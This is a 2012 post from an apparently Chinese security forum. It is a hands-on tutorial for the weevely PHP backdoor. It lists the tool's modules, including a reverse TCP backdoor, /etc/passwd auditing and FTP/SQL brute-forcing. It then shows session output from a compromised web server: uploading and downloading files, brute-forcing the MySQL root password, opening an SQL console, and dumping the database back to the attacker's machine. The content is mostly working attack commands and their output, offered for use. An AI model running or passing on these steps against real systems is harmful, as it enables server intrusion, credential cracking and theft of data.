切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
231 PHP后门 weevely 2 模块[复制链接]
发表于 2012-8-26 19:33:53 | 显示全部楼层 |!read_mode!
weevely有很多模块


  1. :audit.etc_passwd [filter]                                   :find.webdir [rpath]  
  2. :audit.user_files [auto] [list] [path]                       :generate.htaccess [path]  
  3. :audit.user_web_files <url> <rpath> [deep]                   :generate.img <lpath> [outdir]  
  4. :backdoor.reverse_tcp <host> <port>                          :generate.php [path]  
  5. :backdoor.tcp <port>                                         :load
  6. :bruteforce.ftp <user> <lpath> [sline] [host] [port]         :net.ifaces  
  7. :bruteforce.ftp_users <lpath> [host] [port]                  :net.php_proxy [rpath] [finddir]  
  8. :bruteforce.sql <dbms> <user> <lpath> [sline] [host]         :net.proxy [rpath] [rurl] [finddir] [lport]  
  9. :bruteforce.sql_users <dbms> <lpath> [host]                  :net.scan <addr> <port> [onlyknownports] [portsperreq]  
  10. :file.check <rpath> <mode>                                   :set
  11. :file.download <rpath> <lpath>                               :shell.php <cmd> [mode] [proxy] [precmd]  
  12. :file.enum <lpath> [printall]                                :shell.sh <cmd> [stderr]  
  13. :file.read <rpath>                                           :show
  14. :file.rm <rpath> [recursive]                                 :sql.console <dbms> <user> <pwd> [host]  
  15. :file.upload <lpath> <rpath> [chunksize]                     :sql.dump <dbms> <user> <pwd> <db> [table] [host] [lfile]  
  16. :find.name [match] <str> <rpath>                             :sql.query <dbms> <user> <pwd> <query> [host]  
  17. :find.perms [qty] [type] [perm] [rpath]                      :sql.summary <dbms> <user> <pwd> <db> [host]  
  18. :find.suidsgid [type] [rpath]                                :system.info [info]  
复制代码


掩饰:

文章上传

查看信息


  1. www-data@ubuntu:/var/www$ :show file.upload

  2.     [file.upload] Upload a file to the target filesystem
  3.     Usage :file.upload <lpath> <rpath> [chunksize]
  4.    
  5. lpath = /tmp/test          Local file path   
  6. rpath = test                  Remote path   
  7. chunksize = 1024          Chunk size  Type: 'int'
  8. vector =                   Specify vector (file_put_contents, fwrite)  

  9. www-data@ubuntu:/var/www$
复制代码

写入配置 运行


  1. www-data@ubuntu:/var/www$ :file.upload lpath=/tmp/test rpath=my
  2. [modules.file.upload] File 'my' uploaded using 1 chunks of 1024 bytes
  3. True
  4. www-data@ubuntu:/var/www$ cat my
  5. 123test
  6. www-data@ubuntu:/var/www$
复制代码

文件下载查看信息

  1. www-data@ubuntu:/var/www$ :show file.download

  2.     [file.download] Download binary/ascii files from target
  3.     Usage :file.download <rpath> <lpath>
  4.    
  5. rpath =                   Remote file path   
  6. lpath =                   Local file path   
  7. vector =                   Specify vector (file, fread, file_get_contents, base64, copy, symlink)  

  8. www-data@ubuntu:/var/www$
复制代码

运行
  1. www-data@ubuntu:/var/www$ :file.download rpath=up3.html lpath=/tmp/1
  2. [modules.file.download] File correctly downloaded to '/tmp/1'.
  3. www-data@ubuntu:/var/www$
复制代码

查看数据
  1. root@Dis9Team:/tmp# cat /tmp/1
  2. <form action="up3.php" method="POST" enctype="multipart/form-data">
  3. <input type="file" name="userfile">
  4. <input type="submit" value="submit" name="upload">
  5. </form>
复制代码

暴力破解MYSQL
  1. www-data@ubuntu:/var/www$ :bruteforce.sql user=root lpath=/tmp/passwd dbms=mysql
  2. [modules.bruteforce.sql] Using wordlist of 4 words
  3. [modules.bruteforce.sql] FOUND! (root:123456)
  4. www-data@ubuntu:/var/www$
复制代码


注意 LPATH 是本地字典,dbms指定是MYSQL数据库
:bruteforce.ftp_users 也一样的操作

连接数据库破解出来了 咱们来连接看看
查看信息
  1. www-data@ubuntu:/var/www$ :sql.console
  2. [!] Error, required parameters: 'dbms', 'user', 'pwd'
  3. [!] Usage: <dbms> <user> <pwd> [host]
  4. dbms =                   Database (mysql, postgres)  
  5. user =                   SQL user   
  6. pwd =                           SQL password   
  7. host = 127.0.0.1          SQL host or host:port
复制代码

连接
  1. www-data@ubuntu:/var/www$ :sql.console dbms=mysql user=root pwd=123456
  2. [modules.sql.console] No saved state, commands like 'USE database' are ineffective. Press Ctrl-C to quit.

  3. root@127.0.0.1 SQL> show databases;
  4. information_schema
  5. mysql
  6. root@127.0.0.1 SQL> SELECT @@datadir
  7. /var/lib/mysql/
复制代码

MYSQL脱裤
刚才的查询找晓得了有两个库
information_schema
mysql
拖一下
查看信息

  1. www-data@ubuntu:/var/www$ :sql.dump
  2. [!] Error, required parameters: 'dbms', 'user', 'pwd', 'db'
  3. [!] Usage: <dbms> <user> <pwd> <db> [table] [host] [lfile]
  4. dbms =                   DBMS (mysql)  
  5. user =                   SQL user to bruteforce   
  6. pwd =                           SQL password   
  7. db =                           Database name   
  8. table = any                  Table name to dump (any to dump entire database)   
  9. host = 127.0.0.1          SQL host or host:port   
  10. lfile = auto                  Local path (keep 'auto' for automatic naming)   
  11. vector =                   Specify vector (mysqlphpdump, mysqldump)  
复制代码


脱掉! 数据库名字是MYSQL

  1. www-data@ubuntu:/var/www$ :sql.dump dbms=mysql user=root pwd=123456 db=mysql
  2. [modules.sql.dump] Saving 'root:123456@127.0.0.1-mysql' dump in 'root:123456@127.0.0.1-mysql.txt'
  3. www-data@ubuntu:/var/www$
复制代码



他下载到了本地

  1. root@Dis9Team:/pen/door/Weevely# ls
  2. 1  core  LICENSE  modules  README  root:123456@127.0.0.1-mysql.txt  weevely.php  weevely.py
  3. root@Dis9Team:/pen/door/Weevely# cat ^C
  4. root@Dis9Team:/pen/door/Weevely# head root\:123456\@127.0.0.1-mysql.txt
  5. 0 7
  6. -- -------- TABLE 'columns_priv' ----------
  7. -- table is empty

  8. 0 22
  9. -- -------- TABLE 'db' ----------
  10. -- table is empty

  11. 0 22
  12. -- -------- TABLE 'event' ----------
  13. root@Dis9Team:/pen/door/Weevely#
复制代码





操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 04:46

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部